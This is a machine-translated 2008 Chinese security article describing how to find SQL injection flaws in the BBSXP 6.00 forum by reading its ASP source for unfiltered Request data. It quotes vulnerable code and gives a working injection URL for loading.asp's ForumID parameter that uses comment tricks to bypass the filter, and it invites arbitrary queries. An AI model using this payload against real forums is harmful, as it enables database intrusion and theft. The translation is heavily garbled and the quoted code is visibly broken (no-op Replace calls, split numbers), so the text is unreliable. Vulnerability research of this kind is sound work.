BBSXP the latest vulnerability and the discovery process-vulnerability warning-the black bar safety net

ID MYHACK58:62200819326
Type myhack58
Reporter 佚名
Modified 2008-06-11T00:00:00


Operating environment: Micromedia Dreamweaver 8.0+IIS 5.0+SQL Server 2 0 0 0+BBSXP 6.00 SP1 SQL Travel back to the days of work relatively easily, just as everyone presented a few days ago found BBSXP new vulnerability, the way to find the ASP program vulnerability method. See here you should think of NBSI? Yes, NBSI is indeed a good vulnerability detection and the use of the tool, but it can only be for there is a pattern of simple vulnerability. From software testing point of view it is using the Black Box testing method. And now I want to tell you is white-box testing method: from the source code to find vulnerabilities, security coefficient is relatively high the BUG is. Before you begin you want to first select a handy tool, I'm using Dreamweaver 8.0 to. First in DW to create a site. Here to introduce some relevant theory, and script kiddies: this time do not impatient. If is impatient, then you can only do a side dish Birds The purpose is to let everyone get rid of know its however not know why the trouble. Since the ASP of all vulnerabilities are due to the absence of strict parity received from the client data caused by the so-called digital-type, character-type vulnerabilities just in the SQL query statement using a different method. While in the program, all data validation and conversion processes are included in the data received to perform a query between statements, so our focus is going to put in the Get data submitted by the client and splicing the query statement between the data validation process. In order to simplify the lookup process, we to from a number of keywords to start with. Use Dreamweaver's search function to put there may be vulnerabilities in the position to find out. In ASP to receive client data of the method is nothing more than the Request object, use the method of including and similar to Request (“'ForumID'”), Request. QueryString (“'ForumID'”), Request. Form (“'ForumID'”), Request. Cookies (“'ForumID'”) Is. Therefore only need to search Request keywords. The file name that contains Admin, and you do not need to see, because we cannot in ordinary user of the State under the access to these files. Double-click the Bank. asp in a search result in the Edit window, you can see the following code: qmoney=int(Request("qmoney")) if qmoney > Rs("UserMoney") then error("<li>your cash not so much! ") if qmoney<1 then error("<li>Deposit can not be zero!")

Rs("savemoney")=Rs("savemoney")+qmoney+accrual Rs("UserMoney")=Rs("UserMoney")-qmoney Rs("SaveMoneyTime")=now() Rs. update Rs. close Here using the int method for the data conversion, while the use of the Recordset field assignment after save the data, doing so is impossible to produce vulnerability. The fact that the two methods as long as the use of any one cannot be injected, so it can be similar to the data using the method ignored. Double-click Friends. asp in the search results you can find the following code: its Incept=HTMLEncode(Request("its Incept")) UserName=HTMLEncode(Request("UserName"))

sub add if UserName="" then error2("please input you want to add a friend name!")

if UserName=CookieUserName then error2("you cannot add yourself!")

If Conn. Execute("Select id From [BBSXP_Users] where UserName='"&UserName&"'" ). eof Then error2("database does not exist this user!") From the query statement can be seen: if the UserName variable contains single quotes then will generate a character-type injection vulnerabilities. So you need the UserName obtained from the client to the stitching of the query statement in the process of using the HTMLEncode method to filter, this method implements the logic is as follows: function HTMLEncode(fString) fString=Replace(fString,";",";") fString=Replace(fString,"<","<") fString=Replace(fString,">",">") fString=Replace(fString,"\","\") fString=Replace(fString,"--","--") fString=Replace(fString,CHR(9)," ") fString=Replace(fString,CHR(1 0),"<br>") fString=Replace(fString,CHR(1 3),"") fString=Replace(fString,CHR(2 2)," ") fString=Replace(fString,CHR(3 2)," ") fString=Replace(fString,CHR(3 4),""")'double quotes fString=Replace(fString,CHR(3 9),"'")'single quote fString=ReplaceText(fString,"([0-9]);","$1;") 'to solve the Korean characters problem if IsSqlDataBase=0 then 'filtered katakana(Japanese characters)[\u30A0-\u30FF] by yuzi's first fString=escape(fString) fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;") fString=unescape(fString) end if HTMLEncode=fString end function We focus on the method apparently has been filtered single quotes, so it will not produce the character-type injection vulnerabilities. Continue down to see the search results. If you see a similar statement, and use the HTMLEncode method of filtering, we can think that it is safe. In addition there are some of the more common situation, similar to the following code: select case Request("menu") case "add" add case "bad" bad case "Del" Del case "Post" Post case "look" look case "loadLog" loadLog case "addPost" addPost case "" index end select In this code The menu the value of the useless to be used in the query statement, it is impossible to produce injection vulnerability, the same can also be ignored. Above I said many more will not produce a vulnerability of the code, you must be eager to know what kind of code to generate a vulnerability? Come up with a bit of patience to, through the upper surface of these types of situations Troubleshooting analysis after 7 0 2 search results remaining which is only a dozen. The next way to produce exploit code, find Loading. asp first search result you can see this code: id=int(Request("id")) 'ForumID' =HTMLEncode(Request ("'ForumID'")) if id="0" then if Request ("'ForumID'")="0" then sql="select * from [BBSXP_UsersOnline] where UserName<>" and eremite<>1" else sql="select * from [BBSXP_UsersOnline] where 'ForumID' ="& 'ForumID' &" & UserName<>" and eremite<>1" end if From query point of view, this piece of code there should be a digital type injection vulnerabilities. However, it is 'ForumID' but use the HTMLEncode method of filtration, that is in addition to the single quotes and other special characters, letters and common symbols are to be authenticated. In order to confirm this idea, I'm in this section of code was added after the sentence“Response. Write(sql)”is used to test. Enter the following URL: “http://localhost/bbsxp/loading.asp?ForumID=0//select//username//from//bbsxp_user//select////from//bbsxp_usersonline//where// 'forumid' =0” Blank on the page shows us the desired query statement: select * from [BBSXP_UsersOnline] where 'ForumID' =0// select//username//from//bbsxp_user//select////from//bbsxp_usersonline//where// 'forumid' =0 and UserName<>" and eremite<>1 This means that the structure of the statement has successfully passed the system filter. Now we can put in the URL“select//username//from/*/bbsxp_user”modified into an arbitrary, does not contain special characters the SQL query statement. The next operation needless to say? But sometimes the query will not be displayed directly in the interface, we can use Sql Profile to monitor their submitted query. Due to the Forum's security generally relatively high, so the vulnerability lookup...... Most of the time withNeedle in a haystack, only to master some methods of the premise to a certain extent simplify this process. This article is simple for everyone to say a bit of the vulnerability discovery process, relatively speaking still relatively easy one. Probably because BBSXP revision process of the code a large amount without attention to these details of the problem? The more time each one received from the client variables have to go through several methods between the transfer after it will be sent to the database, for such a case is found and the test is more difficult. But plus ça change, as long as you have mastered the method, try more times can always be found. You will gradually understand that a needle in a haystack is not impossible. Finally blab sentence: in fact in addition to just said vulnerability than there is a less visible vulnerability, you can try to search for it. This problem would leave you to believe that you yourself will find!